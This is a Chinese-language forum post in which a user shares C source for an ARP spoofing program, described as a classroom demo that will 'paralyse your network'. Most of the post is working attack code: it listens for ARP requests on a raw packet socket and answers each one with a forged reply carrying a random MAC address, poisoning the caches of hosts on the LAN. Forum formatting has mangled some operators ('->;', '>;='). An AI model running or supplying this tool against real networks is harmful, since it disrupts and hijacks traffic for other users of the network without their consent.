- 论坛徽章:
- 0
|
给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出
真热闹啊! 我也凑凑!
这是我讲课时的示范程序,让你的网络瘫痪,make一下就行了.
- /*
- *
- * This is a simple arp spoof program.
- * It demostrates the usage of PACKET socket.
- * the code is published under GPL.
- * see http://www.gnu.org for the detail of GPL.
- * written by
- * John Bull <john@ccjsj.com>;
- */
- #include <stdio.h>;
- #include <unistd.h>;
- #include <signal.h>;
- #include <fcntl.h>;
- #include <sys/socket.h>;
- #include <features.h>;
- #include <netpacket/packet.h>;
- #include <net/ethernet.h>;
- #include <sys/ioctl.h>;
- #include <sys/types.h>;
- #include <net/if.h>;
- #include <net/if_packet.h>;
- #include <net/if_arp.h>;
- struct etharp {
- struct arphdr hdr;
- unsigned char sender_mac[6];
- unsigned char sender_ip[4];
- unsigned char rcver_mac[6];
- unsigned char rcver_ip[4];
- };
- struct etharp_frame {
- unsigned char dst[6];
- unsigned char src[6];
- unsigned short type;
- struct etharp arp;
- };
- char*
- mac2a(char* dst, unsigned char* addr)
- {
- int i;
- char buf[8];
- dst[0]='\0';
- for (i=0;i<6;i++) {
- sprintf(buf,"%.2X",(unsigned char)addr[i]);
- strcat(dst,buf);
- if (i<5) {
- strcat(dst,":");
- }
- }
- return dst;
- }
- char*
- ip2a(char* dst, unsigned char* addr)
- {
- int i;
- char buf[8];
- dst[0]='\0';
- for (i=0;i<4;i++) {
- sprintf(buf,"%u",(unsigned char)addr[i]);
- strcat(dst,buf);
- if (i<3) {
- strcat(dst,".");
- }
- }
- }
- int
- getIndexbyName(int sd, const char* ifname)
- {
- int ret;
- struct ifreq req;
- strncpy(req.ifr_name,ifname,IFNAMSIZ);
- ret=ioctl(sd,SIOCGIFINDEX,&req);
- if (ret==-1) {
- return -1;
- }
- return req.ifr_ifindex;
- }
- void
- usage(char* argv0)
- {
- printf("usage: %s -i ifname -m\n",argv0);
- }
- main(int argc, char *argv[])
- {
- int sd,fd;
- int ret;
- int iface;
- struct sockaddr_ll my_end,his_end;
- int his_end_len;
- struct etharp_frame rcvBuffer[1],sndBuffer[1];
- char mac[18],ip[16];
- unsigned char fake[6];
- if (argc<2) {
- usage(argv[0]);
- exit(0);
- }
- int c;
- char iface_name[IFNAMSIZ];
- int monitor_mode=0;
- strcpy(iface_name,"eth0");
- while ((c=getopt(argc,argv,"i:m"))>;=0) {
- switch (c) {
- case 'i' :
- strncpy(iface_name,optarg,IFNAMSIZ);
- break;
- case 'm' :
- monitor_mode=1;
- break;
- default :
- usage(argv[0]);
- exit(0);
- break;
- }
- }
- printf("This program keeps running for 60 seconds.\n");
- printf("NIC=%s\n",iface_name);
- printf("Monitor Mode=%i\n",monitor_mode);
- printf("=========\n");
- alarm(60);
- sd=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ARP));
- if (sd==-1) {
- perror("socket");
- exit(1);
- }
- iface=getIndexbyName(sd,iface_name);
- if (iface==-1) {
- perror("ioctl(Request interface index)");
- exit(-1);
- }
- my_end.sll_family=AF_PACKET;
- my_end.sll_protocol=htons(ETH_P_ARP);
- my_end.sll_ifindex=iface;
- ret=bind(sd,(struct sockaddr*)&my_end,sizeof(struct sockaddr_ll));
- if (ret==-1) {
- perror("bind");
- exit(1);
- }
- fd=open("/dev/urandom",O_RDONLY);
- while (1) {
- ret=recvfrom(sd,rcvBuffer,sizeof(rcvBuffer),0,(struct sockaddr*)&his_end,&his_end_len);
- if (ret==-1) {
- continue;
- }
- if (ntohs(rcvBuffer->;arp.hdr.ar_op)==ARPOP_REQUEST) {
- ip2a(ip,rcvBuffer->;arp.sender_ip);
- printf("%s wants to know ",ip);
- ip2a(ip,rcvBuffer->;arp.rcver_ip);
- printf("%s's MAC.\n",ip);
- fflush(stdout);
- if (monitor_mode==1)
- continue;
- read(fd,fake,6);
- memcpy(sndBuffer->;dst,rcvBuffer->;arp.sender_mac,6);
- memcpy(sndBuffer->;src,fake,6);
- sndBuffer->;type=htons(ETH_P_ARP);
- sndBuffer->;arp.hdr.ar_hrd=htons(ARPHRD_ETHER);
- sndBuffer->;arp.hdr.ar_pro=htons(0x0800);
- sndBuffer->;arp.hdr.ar_hln=(char)6;
- sndBuffer->;arp.hdr.ar_pln=(char)4;
- sndBuffer->;arp.hdr.ar_op=htons(ARPOP_REPLY);
- memcpy(sndBuffer->;arp.sender_mac,fake,6);
- memcpy(sndBuffer->;arp.sender_ip,rcvBuffer->;arp.rcver_ip,4);
- memcpy(sndBuffer->;arp.rcver_mac,rcvBuffer->;arp.sender_mac,6);
- memcpy(sndBuffer->;arp.rcver_ip,rcvBuffer->;arp.rcver_ip,4);
- his_end.sll_family=AF_PACKET;
- // his_end.sll_addr should be filled by recvfrom() already
- his_end.sll_halen=6;
- his_end.sll_ifindex=iface;
- sleep(1);
- sendto(sd,sndBuffer,sizeof(sndBuffer),0,(struct sockaddr*)&his_end,sizeof(his_end));
- mac2a(mac,fake);
- printf("\tfaked a %s as the answer.\n",mac);
- }
- }
- close(fd);
- }
复制代码 |
|